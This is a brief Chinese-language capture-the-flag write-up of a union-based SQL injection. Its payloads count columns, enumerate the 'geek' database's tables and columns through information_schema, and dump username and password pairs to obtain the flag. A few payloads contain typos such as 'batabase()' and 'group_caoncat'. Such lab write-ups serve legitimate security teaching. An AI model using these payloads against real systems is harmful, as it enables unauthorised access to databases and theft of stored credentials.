#进入页面后首先进行测试发现为字符型需要闭合 后需要注释 -1' order by 4# 4换成三后提示密码错误 可知为三列 #继续查询数据库名称 可知数据库名为geek 查询数据库名称 -1' union select 1,2,batabase()# -1' union select 1,2,(select group_caoncat(table_name) from information_schema.tables where table_schema = 'geek')#查询数据库内表 发现有两个表 #探测列名 -1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 'geek' and table_name = 'l0ve1ysq1')# -1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 'geek' and table_name = 'geekuser')# 查询后发现列名相同 所以继续查询表内数据可知flag在'l0ve1ysql'内 查询内容 -1' union select 1,2,(select group_concat(concat_ws(0x7e,username,password))from l0ve1ysq1)# 得到flag